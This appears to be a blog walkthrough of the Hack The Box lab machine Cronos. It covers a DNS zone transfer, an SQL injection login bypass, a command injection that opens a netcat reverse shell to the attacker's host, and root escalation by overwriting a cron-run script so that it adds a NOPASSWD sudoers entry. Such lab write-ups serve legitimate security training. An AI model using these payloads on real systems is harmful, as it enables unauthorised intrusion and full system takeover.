HTB: Cronos

Details

This machine is Cronos from Hack The Box

Recon

I started with a service discovery scan

root@kali:~# nmap -sV -p- -T4 10.10.10.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-28 13:33 EDT
Nmap scan report for 10.10.10.13
Host is up (0.042s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.63 seconds

User

I started by looking at the web server

Screenshot 1

Then took a look at port 53

root@kali:~# dig axfr 10.10.10.13 @10.10.10.13

; <<>> DiG 9.11.5-P4-5.1-Debian <<>> axfr 10.10.10.13 @10.10.10.13
;; global options: +cmd
; Transfer failed.

So I tried guessing an initial domain of cronos.htb which I then added to hosts before trying another zone transfer

root@kali:~# dig axfr cronos.htb @10.10.10.13

; <<>> DiG 9.11.5-P4-5.1-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.   604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.   604800  IN  NS  ns1.cronos.htb.
cronos.htb.   604800  IN  A 10.10.10.13
admin.cronos.htb. 604800  IN  A 10.10.10.13
ns1.cronos.htb.   604800  IN  A 10.10.10.13
www.cronos.htb.   604800  IN  A 10.10.10.13
cronos.htb.   604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 32 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Sat Sep 28 14:00:12 EDT 2019
;; XFR size: 7 records (messages 1, bytes 203)

So first I tested http://cronos.htb/

Screenshot 2

It's a laravel site, I'll try the admin one

Screenshot 3

I tried some SQL injections in the username field, using "pass" as the password, eventually trying a username of

' or '1'='1'#

Screenshot 4

I tried adding my IP and clicking execute, but nothing happened, so I selected ping from the dropdown and tried again

Screenshot 5

So I tried setting IP to

8.8.8.8;id

Screenshot 6

So I set a listener and tried injecting a reverse shell

root@kali:~# nc -nlvp 4444

And setting the IP to

8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 4444 >/tmp/f

Which led to

connect to [10.10.14.11] from (UNKNOWN) [10.10.10.13] 48412
/bin/sh: 0: can't access tty; job control turned off
$ 

I now had a shell, so I quickly upgraded it

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@cronos:/var/www/admin$ 

And went looking for my flags

www-data@cronos:/var/www/admin$ cd /home/noulis
www-data@cronos:/home/noulis$ ls -la
total 44
drwxr-xr-x 4 noulis noulis 4096 Apr  9  2017 .
drwxr-xr-x 3 root   root   4096 Mar 22  2017 ..
-rw------- 1 root   root      1 Dec 24  2017 .bash_history
-rw-r--r-- 1 noulis noulis  220 Mar 22  2017 .bash_logout
-rw-r--r-- 1 noulis noulis 3771 Mar 22  2017 .bashrc
drwx------ 2 noulis noulis 4096 Mar 22  2017 .cache
drwxr-xr-x 3 root   root   4096 Apr  9  2017 .composer
-rw------- 1 root   root    259 Apr  9  2017 .mysql_history
-rw-r--r-- 1 noulis noulis  655 Mar 22  2017 .profile
-rw-r--r-- 1 root   root     66 Apr  9  2017 .selected_editor
-rw-r--r-- 1 noulis noulis    0 Mar 22  2017 .sudo_as_admin_successful
-r--r--r-- 1 noulis noulis   33 Mar 22  2017 user.txt

www-data@cronos:/home/noulis$ cat user.txt
[REDACTED]

Root

I checked the crontab

www-data@cronos:/home/noulis$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root  php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Root is running a script, so I went to take a look at this

www-data@cronos:/home/noulis$ cd /var/www/laravel

My initial thought was to edit the laravel schedule, but

www-data@cronos:/var/www/laravel$ ls -la
[SNIP]
-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan
[SNIP]

The binary is owned by me, so I can replace it with my own. What I want to run is

echo "www-data ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 

So in php I need

<?php system('echo "www-data ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'); ?>

Which I base64 encoded to allow easy transfer

PD9waHAgc3lzdGVtKCdlY2hvICJ3d3ctZGF0YSBBTEw9KEFMTCkgTk9QQVNTV0Q6IEFMTCIgPj4gL2V0Yy9zdWRvZXJzJyk7ID8+
www-data@cronos:/var/www/laravel$ echo PD9waHAgc3lzdGVtKCdlY2hvICJ3d3ctZGF0YSBBTEw9KEFMTCkgTk9QQVNTV0Q6IEFMTCIgPj4gL2V0Yy9zdWRvZXJzJyk7ID8+ | base64 -d > ./artisan

I double checked this had worked

www-data@cronos:/var/www/laravel$ cat ./artisan
<?php system('echo "www-data ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'); ?>

Then after a few minutes I checked it had worked

www-data@cronos:/var/www/laravel$ sudo -l
Matching Defaults entries for www-data on cronos.hackthebox.gr:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on cronos.hackthebox.gr:
    (ALL) NOPASSWD: ALL

So I upgraded myself to root

www-data@cronos:/var/www/laravel$ sudo su

And grabbed my flag

root@cronos:/var/www/laravel# cd /root

root@cronos:~# ls -la
total 32
drwx------  4 root root 4096 Apr  9  2017 .
drwxr-xr-x 23 root root 4096 Apr  9  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Mar 22  2017 .cache
drwxr-xr-x  2 root root 4096 Apr  9  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Mar 22  2017 root.txt

root@cronos:~# cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.